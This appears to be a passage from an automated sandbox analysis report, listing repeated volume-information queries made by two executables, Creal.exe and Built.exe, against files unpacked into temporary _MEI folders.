              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
